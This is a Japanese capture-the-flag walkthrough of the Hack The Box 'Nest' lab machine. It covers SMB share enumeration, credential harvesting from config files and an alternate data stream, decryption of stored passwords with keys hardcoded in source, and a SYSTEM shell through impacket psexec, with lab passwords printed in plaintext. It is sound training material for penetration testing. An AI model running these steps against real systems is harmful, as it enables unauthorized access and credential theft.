Hack The Box Nest
Nest
Sweets
Procedure
nmap
PORT STATE SERVICE VERSION 445/tcp open microsoft-ds? 4386/tcp open unknown | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: | Reporting Service V1.2 | FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions: | Reporting Service V1.2 | Unrecognised command | Help: | Reporting Service V1.2 | This service allows users to run queries against databases using the legacy HQK format | AVAILABLE COMMANDS --- | LIST | SETDIR <Directory_Name> | RUNQUERY <Query_ID> | DEBUG <Password> |_ HELP <Command>
4386/tcp
4386/tcpはHQK Reporting Service V1.2というサービスが走っているらしい。何のサービスやコマンドは不明
$ nc 10.10.10.178 4386
HQK Reporting Service V1.2
>help
telnetコマンドで繋ぐと返ってくる。
$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
改行コードが違うのかな?
smbclient
smbclient -L 10.10.10.178 Enter WORKGROUP\ubu's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Data Disk IPC$ IPC Remote IPC Secure$ Disk Users Disk
認証情報なしでは、SecureとUsersの下の閲覧権限がない。Users下のディレクトリは見えた。
smbclient \\\\10.10.10.178\\Data smb: \> mget * NT_STATUS_ACCESS_DENIED listing \IT\* NT_STATUS_ACCESS_DENIED listing \Production\* NT_STATUS_ACCESS_DENIED listing \Reports\* getting file \Shared\Maintenance\Maintenance Alerts.txt of size 48 as Maintenance Alerts.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (1.1 KiloBytes/sec) (average 0.6 KiloBytes/sec)
recon download file
cat Shared/Templates/HR/Welcome\ Email.txt We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME> You will find your home folder in the following location: \\HTB-NEST\Users\<USERNAME> If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you. Username: TempUser Password: welcome2019 Thank you
TempUserのパスワードが手に入った。
smbclient with Tempuser
入手できたファイルが増えた。
$ tree
.
├── IT
│ ├── Archive
│ ├── Configs
│ │ ├── Adobe
│ │ │ ├── editing.xml
│ │ │ ├── Options.txt
│ │ │ ├── projects.xml
│ │ │ └── settings.xml
│ │ ├── Atlas
│ │ │ └── Temp.XML
│ │ ├── DLink
│ │ ├── Microsoft
│ │ │ └── Options.xml
│ │ ├── NotepadPlusPlus
│ │ │ ├── config.xml
│ │ │ └── shortcuts.xml
│ │ ├── RU Scanner
│ │ │ └── RU_config.xml
│ │ └── Server Manager
│ ├── Installs
│ ├── Reports
│ └── Tools
├── Production
├── Reports
└── Shared
├── Maintenance
│ └── Maintenance Alerts.txt
└── Templates
├── HR
│ └── Welcome Email.txt
└── Marketing
20 directories, 11 files
パスワードが記入されたファイルを発見した。おそらくbase64デコードされたものだろう。
$ cat RU\ Scanner/RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
base64デコードしてログインを試みたが、失敗する。
$ smbclient \\\\10.10.10.178\\Data -U C.Smith
Enter WORKGROUP\C.Smith's password:
session setup failed: NT_STATUS_LOGON_FAILURE
ディレクトリ構造が描かれたファイルも発見した。
$ cat IT/Configs/NotepadPlusPlus/config.xml
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
smbclient secure$ secure$の方に入ってみる。
$ smbclient \\\\10.10.10.178\\Secure$ -U TempUser Enter WORKGROUP\TempUser's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Aug 8 08:08:12 2019 .. D 0 Thu Aug 8 08:08:12 2019 Finance D 0 Thu Aug 8 04:40:13 2019 HR D 0 Thu Aug 8 08:08:11 2019 IT D 0 Thu Aug 8 19:59:25 2019
どうも、3つのディレクトリに権限がないらしい。
smb: \> recurse smb: \> ls * . D 0 Thu Aug 8 08:08:12 2019 .. D 0 Thu Aug 8 08:08:12 2019 Finance D 0 Thu Aug 8 04:40:13 2019 HR D 0 Thu Aug 8 08:08:11 2019 IT D 0 Thu Aug 8 19:59:25 2019 \Finance NT_STATUS_ACCESS_DENIED listing \Finance\* \HR NT_STATUS_ACCESS_DENIED listing \HR\* \IT NT_STATUS_ACCESS_DENIED listing \IT\*
Dataの共有フォルダでITの下にCarlディレクトリがあるようだったのでアクセスしてみる。
smb: \IT\> cd Carl smb: \IT\Carl\> ls . D 0 Thu Aug 8 04:42:14 2019 .. D 0 Thu Aug 8 04:42:14 2019 Docs D 0 Thu Aug 8 04:44:00 2019 Reports D 0 Tue Aug 6 22:45:40 2019 VB Projects D 0 Tue Aug 6 23:41:55 2019 10485247 blocks of size 4096. 6545549 blocks available smb: \IT\Carl\> recurse smb: \IT\Carl\> prompt smb: \IT\Carl\> mget * getting file \IT\Carl\Docs\ip.txt of size 56 as ip.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) getting file \IT\Carl\Docs\mmc.txt of size 73 as mmc.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\ConfigFile.vb of size 772 as ConfigFile.vb (1.9 KiloBytes/sec) (average 0.8 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\Module1.vb of size 279 as Module1.vb (0.7 KiloBytes/sec) (average 0.8 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Application.Designer.vb of size 441 as Application.Designer.vb (1.2 KiloBytes/sec) (average 0.8 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Application.myapp of size 481 as Application.myapp (1.3 KiloBytes/sec) (average 0.9 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\AssemblyInfo.vb of size 1163 as AssemblyInfo.vb (3.1 KiloBytes/sec) (average 1.2 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Resources.Designer.vb of size 2776 as Resources.Designer.vb (7.3 KiloBytes/sec) (average 2.0 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Resources.resx of size 5612 as Resources.resx (14.9 KiloBytes/sec) (average 3.4 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Settings.Designer.vb of size 2989 as Settings.Designer.vb (7.7 KiloBytes/sec) (average 3.8 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\My Project\Settings.settings of size 279 as Settings.settings (0.7 KiloBytes/sec) (average 3.6 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\RU Scanner.vbproj of size 4828 as RU Scanner.vbproj (13.0 KiloBytes/sec) (average 4.3 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\RU Scanner.vbproj.user of size 143 as RU Scanner.vbproj.user (0.4 KiloBytes/sec) (average 4.0 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\SsoIntegration.vb of size 133 as SsoIntegration.vb (0.4 KiloBytes/sec) (average 3.8 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\Utils.vb of size 4888 as Utils.vb (12.9 KiloBytes/sec) (average 4.4 KiloBytes/sec) getting file \IT\Carl\VB Projects\WIP\RU\RUScanner.sln of size 871 as RUScanner.sln (2.2 KiloBytes/sec) (average 4.2 KiloBytes/sec)`
ファイルが取得できた。 中を見ていくと、Util.vbに暗号化と複合化のコードがある。さっき手に入れたパスワードっぽい文字列は暗号化しているのかも。
Imports System.Text Imports System.Security.Cryptography Public Class Utils Public Shared Function GetLogFilePath() As String Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt") End Function Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function Public Shared Function EncryptString(PlainString As String) As String If String.IsNullOrEmpty(PlainString) Then Return String.Empty Else Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) End If End Function
"464R5DFA5DL6LE28"でググると、ここが見つかった。誰かが描いてくれたんかな。もしかしたらこのBOXの回答者かも。複合化されたパスワード(xRxRxPANCAK3SxRxRx)が手に入る。
smbclient
入手したクレデンシャルで最再度smbログインを行う。
$ smbclient \\\\10.10.10.178\\Users -U C.Smith Enter WORKGROUP\C.Smith's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sun Jan 26 08:04:21 2020 .. D 0 Sun Jan 26 08:04:21 2020 Administrator D 0 Sat Aug 10 00:08:23 2019 C.Smith D 0 Sun Jan 26 16:21:44 2020 L.Frost D 0 Fri Aug 9 02:03:01 2019 R.Thompson D 0 Fri Aug 9 02:02:50 2019 TempUser D 0 Thu Aug 8 07:55:56 2019 cd 10485247 blocks of size 4096. 6545661 blocks available smb: \> cd C.Smith\ C.Smith\HQK Reporting\ C.Smith\user.txt smb: \> cd C.Smith\ smb: \C.Smith\> get user.txt getting file \C.Smith\user.txt of size 32 as user.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
get user flag !!
admin flag
dir walk HqkLdap.exeは.netの実行ファイル。LDAPのqueryや暗号化の処理が書いてあった。 UsersのC.Smithのディレクトリ下にdebugモードのパスワードなどがあるが、中身は空っぽ、、、うーん怪しい。
├── HQK Reporting │ ├── AD Integration Module │ │ └── HqkLdap.exe │ ├── Debug Mode Password.txt │ └── HQK_Config_Backup.xml └── user.txt
allinfoコマンドを叩いてみる。
smb: \C.Smith\> allinfo "HQK Reporting\Debug Mode Password.txt" altname: DEBUGM~1.TXT create_time: 金 8月 9 08時06分12秒 2019 JST access_time: 金 8月 9 08時06分12秒 2019 JST write_time: 金 8月 9 08時08分17秒 2019 JST change_time: 金 8月 9 08時08分17秒 2019 JST attributes: A (20) stream: [::$DATA], 0 bytes stream: [:Password:$DATA], 15 bytes
ADSにPasswordの文字列を発見。
smb: \C.Smith\> more "HQK Reporting\Debug Mode Password.txt:Password" WBQ201953D8w
debug用のパスワード(WBQ201953D8w)が手に入った。
4386/tcp
先ほど入手したパスワードを4386/tcpのサービスに入れてみる。
telnet 10.10.10.178 4386 Trying 10.10.10.178... Connected to 10.10.10.178. Escape character is '^]'. HQK Reporting Service V1.2 >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> >debug WBQ201953D8w Debug mode enabled. Use the HELP command to view additional commands that are now available >help This service allows users to run queries against databases using the legacy HQK format --- AVAILABLE COMMANDS --- LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> SERVICE SESSION SHOWQUERY <Query_ID>
コマンドが増えた!!
setdirでカレンとディレクトリを指定できて、showqueryでファイル内容が表示できる模様。Administratorのパスワードが手に入る。
>setdir C:\Program Files\HQK Current directory set to HQK >list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [DIR] ALL QUERIES [DIR] LDAP [DIR] Logs [1] HqkSvc.exe [2] HqkSvc.InstallState [3] HQK_Config.xml Current Directory: HQK >set dir LDAP Unrecognised command >setdir LDAP Current directory set to LDAP >list Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command QUERY FILES IN CURRENT DIRECTORY [1] HqkLdap.exe [2] Ldap.conf Current Directory: LDAP >showquery 2 Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
先程の .NET Fiddleで複合化を施行するも複合できない。 exeにあった情報で複合するのがいいっぽい。 今度は自分でちゃんとやったwでコンパイルしたコードにメイン関数を追加しただけw
パスワード(XtH4nkS4Pl4y1nGX)が手に入った!!
impacketのpsexecを使う
$ python3 /opt/impacket/examples/psexec.py administrator:XtH4nkS4Pl4y1nGX@10.10.10.178 Impacket v0.9.24.dev1+20210827.162957.5aa97fa7 - Copyright 2021 SecureAuth Corporation [*] Requesting shares on 10.10.10.178..... [*] Found writable share ADMIN$ [*] Uploading file aeexaNwJ.exe [*] Opening SVCManager on 10.10.10.178..... [*] Creating service gTVc on 10.10.10.178..... [*] Starting service gTVc..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system